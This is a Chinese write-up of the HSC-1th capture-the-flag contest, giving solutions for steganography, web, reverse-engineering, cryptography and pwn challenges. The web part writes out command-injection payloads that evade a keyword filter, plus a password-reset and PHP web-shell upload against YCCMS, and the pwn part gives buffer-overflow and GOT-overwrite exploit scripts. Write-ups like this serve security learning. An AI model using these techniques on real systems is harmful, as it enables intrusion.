HSC-1th大赛-Writeup
比赛是一月份的,整理了下writeup,CSDN上也发一下份吧。
MISC
0x01 Sign-in
前往红客突击队公众号发送“HSC2019”并签到吧!
0x02 DORAEMON
下载后doraemon.zip,压缩软件打开有提示:哆啦A梦把泡好的QR放进口袋后,用六位数字把自己放好了。你能找到它吗?
用Advanced Archive Password Recovery爆破得到6为数字密码:376852
解压后得到一张哆啦A梦的图片,根据提示利用tweakpng软件修改高度,得到一张缺角的二维码,补齐:
扫描得到flag:flag{sing1emak3r10v3m!sc}
0x03 汝闻,人言否
下载得到attach.zip,解压的到图片:汝闻,人言否.png,用010editor打开,发现png尾后面有追加数据,而且是KP开头,提取出来修改一下得到压缩包。
压缩包发现有密码,提示为一段字符串:qazsedcftrfvgycft6yhntgbnytfvbhyik,.;p,根据经验应该是键盘密码,得到解压密码WVALOU,得到flag文件,文件头是RIFF,修改后缀为wav。
audacity.exe打开查看频谱得到flag:
0x04 PERFORMANCE-ART
下载后为Performance_art.zip,解压后为一张图片:
百度银河语言,翻译过来为50 4B开头的二进制,生成压缩包后解压的到:ZmxhZ3tnNUEwIWkyZjF9
0x05 WIRESHARK
下载是wireshark.zip,打开发现需要密码,直接用010 editor查看,发现文件尾是png图片,提取出png:
尝试Wireshark密码不对,利用stegsolve查看lsb信息,发现隐藏另外一张png图片,提取出来得到一张二维码:
扫描得到wrsak…iehr370,明显是栅栏密码,得到解压密码wireshark3.7.0,解压后得到wireshark文件,发现结尾是pdf特征,补pdf头。得到pdf文件,利用wbstego得到flag
flag{Go0dJ0B_y0ufIndLt}
0x06 PCXP
下载下来raw镜像,magent AXIOM分析,经过排查找到一些可能比较特殊的文件名,以及一些其他的信息:
使用volatility成功提取并正常打开的文件如下(rar -> flag.rar,mirror1.rar文件更小, 两个mirror都包含mirror.png文件):
可以看到mirror1.rar的解压密码:key:mirror,mirror2.rar用密码打不开,暂时不管。
解压后的到png图片,lsb隐写,提取:zsteg -E “extradata:0” mirror.png > mirror1:
发现png尾,二进制反转代码得到png图片:
with open('mirror1','rb') as f:
with open('mirror1.png', 'wb') as g:
g.write(f.read()[::-1])
得到压缩密码:HSC-1th202248H,解压缩后得到secret.pcap,以为是usb鼠标或者键盘流量,结果foremost直接分离出两张图片,尺寸大小一样,直接盲水印得到flag:
flag{Wat3rMarkPtysc}
Web
0x01 CLICK
前端验证,直接查看/static/main.js文件,发现base64字符串,解密得到flag{be92495e-b0b4-46dd-af33-90b10af858eb}
0x02 Web-sign in
打开提示你知道robots协议吗?直接查看robots.txt
访问fiag_ls_h3re.php,发现f12和右键均被禁用,那就直接在打开页面之前打开f12,得到flag。
0x03 EXEC
命令执行发现过滤了很多关键字
exp:?cmd=l’'s${IFS}/>/var/www/html/a,再访问a,得到ctf_is_fun_flag2021文件,
再构造?cmd=n’‘l${IFS}/ctf_is_fun_fl’'ag2021>/var/www/html/a得到flag:flag{4449e8e6-ceec-4fc0-9d38-64559dd5197f}
0x04 CMS SYSTEM
打开网站,直接添加admin发现后台,发现是YCCMS,访问www.zip发现源码。
通过检索发现YCCMS存在任意密码重置漏洞,相关poc参考下文。
https://www.cnblogs.com/0daybug/p/12932677.html
登陆后抓包修改参数 a=admin&m=update,POST 传入:
username=admin&password=admin¬password=admin&send=%E4%BF%AE%E6%94%B9%E5%AF%86%E7%A0%81
后台存在文件上传漏洞:
https://blog.csdn.net/qq_43233085/article/details/105447576
LogoUpload.class.php 中发现会将文件重命名,并且后缀可控,直接修改为shell.png.php,上传后访问view/index/images/logo.php,显示文件存在,直接利用读取flag
REVERSE
0x01 hiahia o(▽)┛**
下载文件Aha.exe,拖入ida搜索字符串,发现Aha, Well done!
res="igdb~Mumu@p&>%;%<$<p"
flag=""
for i in range(len(res)):
if i>9:
if i%2==1:
flag+=chr(ord(res[i])+13)
else:
flag+=chr(ord(res[i])-11)
else:
if i%2==1:
flag+=chr(ord(res[i])+5)
else:
flag+=chr(ord(res[i])-3)
print(flag)
#flag{RrrrEe33202111}
0x02 ANDROID
下载apk文件,拖入Android Killer查看java,
直接写代码:
strs = [102, 13, 99, 28, 127, 55, 99, 19, 109, 1, 121, 58, 83, 30, 79, 0, 64, 42]
flag = ''
j=[]
for i in range(len(strs)-2,-1,-1):
#print(chr(strs[i]))
if i%2 == 0:
strs[i] ^= i
else:
strs[i] ^= (strs[i+1])
print("".join(chr(i) for i in strs))
#flag{Reverse__APP}
0x03 WAY
下载得到:maze-upx.exe,看名称先upx -d,拖入ida查看字符串,迷宫题:
找到maze:
画5x5的图,根据路线得到sdsddwd,md5得到flag:
0x04 SPARK
sparc指令集,ida无法反编译,直接分析汇编代码
这里用大端序将最后要比较的结果放到栈上
从这里知道输入的长度应为10,输入的每个字符减去0x2F,最后和已知的结果比较
将已知的结果全部加上0x2F即可得到flag
a=0x37463f3044413243
b=0xD0A4003044413243
c=0xffffffffffffffff
print(hex((b>>38)&c))# 0x3429000L
s="37463f30444132433429"
arr=[]
for i in range(0,len(s),2):
arr.append(int(s[i:i+2],16))
for i in range(len(arr)):
arr[i]+=0x2f
print("".join(chr(i) for i in arr))
# fun_sparcX
0x05 VM
从sub_400FB4函数知道输入的长度应为16:
所有vm的操作都在sub_400EBF函数的第12行执行
起调试,构造一个长度为16的输入,”abcdefghijklmn12”
经过调试知道,输入的每个字符先异或8,再异或3,然后加1,最后和已知的res比较
对res写逆运算脚本即可得到flag
res="m<epbe<j~g;yo@ys"
s="abcdefghijklmn12"
print(hex(ord("a")^8^3))# 0x6a
print(hex(0x6a+1))# 0x6b
flag=""
for c in res:
flag+=chr((ord(c)-1)^8^3)
print(flag)
#g0odjo0bvm1se4sy
CRYPTO
0x01 Easy SignIn
下载得到密文:5445705857464579517A4A48546A4A455231645457464243566B5579556C7053546C4A4E524564565646644D515670455130354C5755644F5231685256314A5452315A5552304E57576C5A49525430395054303950513D3D
ciphey直接出flag
0x02 AFFINE
仿射密码,参考https://icode9.com/content-4-1124105.html
先求a和b
# -*- coding: utf-8 -*-
import string
import hashlib
letter=string.ascii_letters+string.digits
m='xGJ13kkRK9QDfORQomFOf9NZs9LKVZvGqVIsVO9NOkorv'
flag='flag'
def f():
for i in range(100):
for j in range(100):
c=[]
for len in range(4):
ch = flag[len]
t=(letter.index(ch) * i + j) % 62
c.append(letter[t])
d = ''.join(c)
#print(d)
if d in m:
print("i=",i)
print("j=",j)
return
f()
letter = string.ascii_letters+string.digits
m = 'xGJ13kkRK9QDfORQomFOf9NZs9LKVZvGqVIsVO9NOkorv'
a = 11
b = 17
c = []
for i in range(len(m)):
ch = m[i]
t = letter.index(ch)
x = (17*(t-17)) % 62
x = int(x)
c.append(letter[x])
d = ''.join(c)
print(d)
md5一下就是flag
0x03 LINE-GENERATION-TEST
下载得到一张图片,hill密码
希尔密码然后求逆矩阵,矩阵相乘得到flag:RSCTF,md5加密后提交flag{e4163deba70420c58acb87abcab34141}。
0x04 LATTICE
下载看脚本,发现flag分为三部分,
flag = b'flag{******}'.strip(b'flag{').strip(b'}')
_length = len(flag)
f1, f2, f3 = [flag[_*_length//3:(_+1)*_length//3] for _ in range(3)]
直接利用la佬博客脚本https://lazzzaro.github.io/2020/05/06/crypto-RSA/,稍微改一下,把判定删掉,输出所有结果:
#第一部分
from sage.all import *
import gmpy2
N = 23818305284450407798474543841442778164118430521610043726789505700531857211139233983927667740426681473611421781216471548321033175378524550659451949200683096575646597770420333524204176282763665882864564388471765969302954420394630419303362777912490426962573169221783887636684177478144311692343348905299751465406910364431823004781961449409682714094129123403882257872835302752664170847941259148324938528680748942030111986004367624657807913886922193265189704092735093802344832636336165737460259604641005316302692291726246828545907406645433265956061936110408800751546469158181520009116013316133121377819590970122050812854789
e1 = 9835783673095553446058291384176228043002331943350999034534623274992838739022521971236805050273046260025059987203730927700121664052723407432747645871296445872656798765584552764267628989278697521984943241908192986396530077301150942289434104385028360155639928443785704472753619847188084726935475600846835326073460115218216212785556408708462269105328394030996217916556873627266842330668453858483713498138654428487949944189108261563568558572124107380903712891578297171120862197369764331518753921684965420121318071916309204747667657476806551055584210466752436702176078704990826846481952895354353484344820523539218467328609
e2 = 17375316355314118406320219911734421029944943076411309671685926390155316380478008061756850363872585667159388923531318955662085005614917843442976105969167039475936924220396528915648168982023113542542201704319766653086540015877222620054173299245668195344488548155446059033287516207223970884670005185996184076538885012087996848877993859469631166842992572290730174768464087877396078823473042762659765399198326507762349243538341205082556290883091174177379098626493382561067493560893603313231705260729621890489619111083150474886626958850812093915647702385689897792432029133765456750687073104627271449802966450876185872407293
c = 18256586437688071179499177390976877033843124074731118595784275706275462549393575070193713157285247155052783040660186349191946243206621283417854114947512338510120090494075462629459661733719232454448765943733550405428870484328139300079099605288398777526459160412929323065084297815106233447065396152086777361372972058145457645409788067204097788931227023450019519408351421367564315618548463098307984698849151129213729707495350390245146946120917928822783651413957541976992382340037410396051196233685887265029041398105471757470103910841819186967349443174641098166881199762042452259613391893862411694579851230262676110579543
for i in range(1000):
alpha2 = i/1000
M1 = int(gmpy2.mpz(N)**0.5)
M2 = int(gmpy2.mpz(N)**(1+alpha2))
D = diagonal_matrix(ZZ, [N, M1, M2, 1])
B = Matrix(ZZ, [[1, -N, 0, N**2],
[0, e1, -e1, -e1*N],
[0, 0, e2, -e2*N],
[0, 0, 0, e1*e2]]) * D
L = B.LLL()
v = Matrix(ZZ, L[0])
x = v * B**(-1)
phi = (x[0, 1]/x[0, 0]*e1).floor()
try:
d = inverse_mod(65537, phi)
m = hex(power_mod(c, d, N))[2:]
print(i)
print(bytes.fromhex(m))
#break
except:
pass
最后拼起来得到:flag{89c63fd5-00cf-4ae0-b369-5a3d94a20a2c}
0x05 RSA
NewsCTF 2021 新春赛原题:
n=124689085077258164778068312042204623310499608479147230303784397390856552161216990480107601962337145795119702418941037207945225700624828698479201514402813520803268719496873756273737647275368178642547598433774089054609501123610487077356730853761096023439196090013976096800895454898815912067003882684415072791099101814292771752156182321690149765427100411447372302757213912836177392734921107826800451961356476403676537015635891993914259330805894806434804806828557650766890307484102711899388691574351557274537187289663586196658616258334182287445283333526057708831147791957688395960485045995002948607600604406559062549703501
t=10
import gmpy2
for k in range(-1000000,1000000):
x=gmpy2.iroot(k**2+4*t*n,2)
if x[1]:
p=(-k+x[0])//(2*t)
q=t*p+k
break
import gmpy2
from Crypto.Util.number import long_to_bytes,bytes_to_long
phi=(p-1)*(q-1)
e=57742
c=124689085077258164778068312042204623310499608479147230303784397390856552161216990480107601962337145795119702418941037207945225700624828698479201514402813520803268719496873756273737647275368178642547598433774089054609501123610487077356730853761096023439196090013976096800895454898815912067003882684415072791099101814292771752156182321690149765427100411447372302757213912836177392734921107826800451961356476403676537015635891993914259330805894806434804806828557650766890307484102711899388691574351557274537187289663586196658616258334182287445283333526057708831147791957688395960485045995002948607600604406559062549703501
t=gmpy2.gcd(e,phi)
d=gmpy2.invert(e//t,phi)
m=pow(c,d,n)
msg=gmpy2.iroot(m,t)
if msg[1]:
print(long_to_bytes(msg[0]))
#flag{6d22773623d3d5c871692e9985de5f16}
0x06 BABY-RSA
先用lfsr还原出p的高位:
from Crypto.Util.number import *
import gmpy2
def lfsr(status,mask):
out = (status << 1) & 0xffffffff
i=(status&mask)&0xffffffff
lastbit=0
while i!=0:
lastbit^=(i&1)
i=i>>1
out^=lastbit
return (out,lastbit)
status= 1
mask = 0b10110001110010011100100010110101
key = '0101110100100111011011011000111010000111101000101010100100100011010111011000010010100101110110011101110110010100010111001110010011101010111011001100011011010110001010011111111110100110101010101110100110011010110101110110000110010101010000010110100110110110001110101011000011110100011011100101101101001000110010100111000111001111010101011011111110010111100101111001010000100010100001000111010011011111010011101100011101011010011010110001101110110110000110010011001101100000110000110100101010010010110101100101111101110000010011101110010101110100011101100110111111001010'
s = ''
for i in range(568):
(status,out)=lfsr(status,mask)
p2 = out^int(key[i])
s = s+str(p2)
print(s)
p = int(s,2)
print(p)
# 484896331241166236766986322307256381427323829969266475890843705533431739217993785274442520213477613786483789873490025705365184544110819157393140954140256890174240795425112
已知p的高位,可以利用Coppersmith定理恢复出完整的p:
p= 90225006288627020933267024425797647042965554486273674145474629022335483579168020321334177600624475358419458781387021577078957978886555066264514364951229871833611713144617155837023313756741716041993159155093522769416742461683810041045361926334946115547487234272520914249496954864904467634471167509689549908477
再解常规RSA得到flag
PWN
0x01 Ez_pwn
pwn签到,直接拖进ida分析,发现gets函数及后门:
from pwn import *
#io=process("./pwn")
io = remote('hsc2019.site',10203)
payload=b'a'*0x48+p64(0x400741)
io.sendline(payload)
io.interactive()
0x02 EZPWN
程序可以任意地址写,保护没开pie,存在后门函数。修改某个got为后门函数即可:
from pwn import *
#io=process("./pwn2")
elf=ELF("./pwn2")
io = remote('hsc2019.site', 10203)
name=0x6010A0
puts_got=elf.got["puts"]
bkdoor=0x400796
print("puts_got->"+hex(puts_got))
io.recvuntil(b"your ID?\n")
payload=asm(shellcraft.sh())#.ljust(b'a',0x40)
io.sendline(payload)
io.recvuntil(b"Give me the target address?")
io.sendline(str(puts_got).encode())
io.recvuntil(b"Give me the data: ")
# pause()
# gdb.attach(io)
io.sendline(p64(bkdoor))
io.interactive()
